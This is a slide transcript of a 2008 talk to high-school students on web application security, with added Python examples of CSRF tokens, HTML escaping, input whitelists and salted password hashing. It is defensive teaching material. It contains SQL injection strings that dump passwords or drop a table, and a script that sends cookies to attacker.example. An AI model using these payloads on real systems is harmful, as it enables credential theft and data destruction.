Web Application Security
A talk for Damascus High School (Maryland) students.

Transcript

  • 1. Web Application Security: Why is it important? Jason R. Leveille, http://jasonleveille.com, December 5, 2008 – Damascus High School
  • 2. Introduction
    • High School Teacher for 8 Years
    • Web Software Developer for 1.5 years
    • Security is not my strong point
      • Why am I talking about security?
    • Security is a concern in many layers
      • Server Layer (Apache, IIS, etc)
      • Database Layer (MySQL, PostgreSQL, etc)
      • Application Language/Script (PHP, Python, etc)
      • Web App Server/Client Side
  • 3. A Brief Example: PHP info/secinfo
    • What we see when we look at phpinfo()
      • http://url/talk/psi/info.php
    • What we see when we look at PHPSecInfo feedback
      • http://url/talk/psi/
      • Illustrates the need to secure your “language”, in your server environment, as best you can
  • 4. SQL Injection
    • What is SQL Injection
    • An example
      • Stealing usernames/passwords
      • http://url/talk/ex1.php (ex5.php)
      • ?userid=5
      • ?userid=5 union all select id,email,password from users--
      • What happened?
      • The Source Code
      • Things to think about
  • 5. SQL Injection
    • Another example
      • Drop Table
      • http://xkcd.com/327
      • http://url/talk/foo.php
      • ?first_name=Jason
      • ?first_name=Jason'; DROP TABLE users;
      • What happened?
      • An illustration in phpMyAdmin
      • Things to think about
  • 6. Cross Site Scripting (XSS)
    • What is XSS?
    • An Example
      • Cookie theft
      • http://url/talk/ex2.php
      • What happened?
      • The Source Code
      • Things to think about
  • 7. Cross Site Scripting (XSS)
    • A real world example
    • ASP application / SQL Server attack
      • Combined XSS SQL Injection
      • Installation of malware
      • Our attack traced back to organized crime in Russia!
      • Should I not have written that …
  • 8. Cross Site Request Forgery (CSRF)
    • What is CSRF?
    • An Example
      • http://en.wikipedia.org/wiki/Cross-site_request_forgery#Example_and_characteristics
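The Wikipedia example the slide points at (a bank transfer that fires because the victim's browser attaches the session cookie to a request an attacker's page triggered), as an added example that is not part of the talk. The bank endpoint, the session and request layouts and the token scheme (an HMAC of the session id under a server key, rendered into the bank's own form) are assumptions made for the demo; the defence shown is the synchronizer-token pattern from the Shiflett article in the resources.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; generated here for the demo (assumption: in a real
# application it lives in configuration, not in code).
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session):
    """Token the attacker cannot know: HMAC(server key, session id). It is
    rendered into the site's own forms and checked on every state change."""
    return hmac.new(SERVER_KEY, session["id"].encode(), hashlib.sha256).hexdigest()


def transfer_form(session):
    """The bank's own page carries the token in a hidden field."""
    return ('<form method="POST" action="/transfer">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="to"><input name="amount"><input type="submit"></form>'
            % csrf_token(session))


def transfer_vulnerable(request, session):
    """Wikipedia-style bank endpoint: if the browser sent the victim's session
    cookie, the transfer happens, no matter which site made the request."""
    if session is None:
        return "login required"
    p = request["params"]
    return "moved %s from %s to %s" % (p["amount"], session["user"], p["to"])


def transfer_protected(request, session):
    """Same endpoint with two checks: state changes need POST (so an
    <img src=...> on a foreign page cannot trigger one) and the POST must
    carry the token from the bank's own form (so an auto-submitted form on a
    foreign page cannot either)."""
    if session is None:
        return "login required"
    if request["method"] != "POST":
        return "rejected: GET may not change state"
    sent = request["params"].get("csrf_token", "")
    if not hmac.compare_digest(sent, csrf_token(session)):
        return "rejected: missing or wrong csrf_token"
    p = request["params"]
    return "moved %s from %s to %s" % (p["amount"], session["user"], p["to"])


# Constructed traffic. Bob is logged in; his browser attaches his cookie to
# every request to the bank, including the ones an attacker's page triggers.
BOB = {"id": "sess-7f3a", "user": "bob"}

FORGED_IMG_GET = {"method": "GET",
                  "params": {"to": "mallory", "amount": "1000000"}}
FORGED_POST = {"method": "POST",
               "params": {"to": "mallory", "amount": "1000000"}}


def legitimate_post(session, to, amount):
    """What Bob's own browser sends after submitting transfer_form()."""
    return {"method": "POST",
            "params": {"to": to, "amount": amount,
                       "csrf_token": csrf_token(session)}}
```

The token is bound to the session, so a token the attacker obtains for their own session is rejected for Bob's; `hmac.compare_digest` keeps the comparison constant-time. Note that the vulnerable endpoint is not "unauthenticated": Bob is logged in, which is exactly why the forged request works.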
  • 9. Security: Filter Input
    • What is input?
    • What does it mean to filter input?
      • An example
        • http://url/talk/ex3.php
        • What’s happening?
        • The Source Code
        • Things to think about
  • 10. Security: Escape Output
    • What is output?
    • What does it mean to escape output?
      • An example
        • http://url/talk/ex4.php
        • What’s happening?
        • The Source Code
        • Things to think about
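The cookie theft of slide 6 and the two rules of slides 9 and 10 (filter input, escape output), as one added example that is not the talk's ex2.php, ex3.php or ex4.php (whose source is not on this page). The page being rendered, the attacker host in the payload and the whitelists for `first_name` and `userid` are assumptions for the demo; in PHP the same work is done by htmlentities() for output and ctype_*() or preg_match() for input, both of which the talk lists as resources.

```python
import html
import re

# Constructed input: the cookie-theft payload of slide 6, pointed at an
# attacker host that is an assumption for the demo.
COOKIE_THEFT = ("<script>document.location='http://attacker.example/?c='"
                "+document.cookie</script>")


def greet_vulnerable(name):
    """ex2.php-style page: the parameter is echoed straight into the HTML, so a
    <script> in it runs in the victim's browser with the victim's cookies."""
    return "<p>Hello, " + name + "</p>"


def greet_escaped(name):
    """Escape output: the same page, but the value is encoded for an HTML text
    node, so '<' reaches the browser as '&lt;' and is displayed, not parsed."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def link_to_profile(userid, label):
    """Escape output in an attribute: quote=True also turns '"' into '&quot;',
    which is what stops a value from closing the title attribute and adding
    an onmouseover= handler of its own."""
    safe = html.escape(label, quote=True)
    return '<a href="/profile?userid=%d" title="%s">%s</a>' % (userid, safe, safe)


# Filter input: whitelists chosen for this demo (the talk's ex3.php rules are
# not on this page). Reject what does not match; do not try to clean it.
FIRST_NAME_RE = re.compile(r"[A-Za-z][A-Za-z' -]{0,49}")
USERID_RE = re.compile(r"[0-9]{1,9}")


def filter_first_name(raw):
    """Accept only what a first name may contain; anything with '<', ';' or a
    quote-plus-keyword in it is refused before it reaches SQL or HTML."""
    value = raw.strip()
    if FIRST_NAME_RE.fullmatch(value) is None:
        raise ValueError("first_name rejected")
    return value


def filter_userid(raw):
    """?userid must be a short run of ASCII digits; the union payload of
    slide 4 fails here before any query is built."""
    if USERID_RE.fullmatch(raw) is None:
        raise ValueError("userid rejected")
    return int(raw)


def render_page(params):
    """Both rules together: validate on the way in, escape on the way out."""
    name = filter_first_name(params.get("first_name", ""))
    userid = filter_userid(params.get("userid", ""))
    return greet_escaped(name) + link_to_profile(userid, name)
```

Two caveats a practitioner would add: the name whitelist above is deliberately narrow and rejects accented names, so widen it on purpose rather than by loosening it to "anything but `<`"; and escaping is context-specific, which is why the text-node and attribute cases are shown separately (a value placed inside a `<script>` block or a URL needs yet another encoding, as the Shiflett character-encoding article in the resources discusses).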
  • 11. Security: Database User Privileges
    • What are user privileges?
    • Reducing user privileges
      • An example
        • Creating a reduced user privileged account
        • Attempting DROP TABLE with this new account
        • Things to think about
  • 12. In Conclusion
    • Take care of your own information online
    • Never trust data coming into your application
    • Filter Input
    • Escape Output
    • Reduce Database User Privileges
    • Always store passwords hashed
      • See example of student passwords
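"Always store passwords hashed", as an added example that is not part of the talk (the student-password example it refers to is not on this page, and the sample accounts below are made up). The talk only says "hashed"; the choice here of a per-user random salt and a slow, iterated hash (PBKDF2-HMAC-SHA256 from the standard library) is this example's, and the iteration count is an assumption to tune per machine. What a leak like slide 4's UNION query then exposes is the hash string, not the password.

```python
import hashlib
import hmac
import os

# Work factor is an assumption for the demo; raise it as hardware allows.
ITERATIONS = 200_000


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256. Returns one storable string carrying the
    algorithm, iteration count, salt and digest, so parameters can change later
    without invalidating existing rows."""
    if salt is None:
        salt = os.urandom(16)            # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iterations; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def register(store, username, password):
    """Only the hash string is written; the password itself is never stored."""
    store[username] = hash_password(password)


def login(store, username, password):
    stored = store.get(username)
    if stored is None:
        # Hash anyway so an unknown user takes as long as a wrong password.
        hash_password(password)
        return False
    return verify_password(password, stored)
```

The salt is why two users with the same password get different stored strings, which defeats precomputed tables; the iteration count is why guessing is slow. A plain MD5 or SHA-1 of the password, common in 2008-era PHP code, has neither property. Where a dedicated password hash such as bcrypt or Argon2 is available it is the better choice; the storage-format idea above carries over unchanged.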
  • 13. Questions?
    • http://jasonleveille.com
    • leveillej at gmail dot com
  • 14. Resources
    • http://www.apachesecurity.net/
    • http://www.microsoft.com/technet/security/prodtech/IIS.mspx
    • http://www.scribd.com/doc/2569459/Securing-MySQL-for-a-Security-Audit
    • http://www.postgresql.org/docs/8.3/static/user-manag.html
    • http://phpsec.org/projects/phpsecinfo/index.html
  • 15. Resources
    • http://dev.mysql.com/tech-resources/articles/guide-to-php-security-ch3.pdf
    • http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
    • http://xkcd.com/327/
    • http://xssed.org/
    • http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines
  • 16. Resources
    • http://shiflett.org/articles/cross-site-request-forgeries
    • http://php.net/ctype
    • http://us3.php.net/strip-tags
    • http://us2.php.net/manual/en/book.pcre.php
    • http://ha.ckers.org/xss.html
    • http://shiflett.org/blog/2007/mar/allowing-html-and-preventing-xss
  • 17. Resources
    • http://us.php.net/htmlentities
    • http://shiflett.org/blog/2007/may/character-encoding-and-xss
    • http://htmlpurifier.org/
    • http://us.php.net/manual/en/mysqli.real-escape-string.php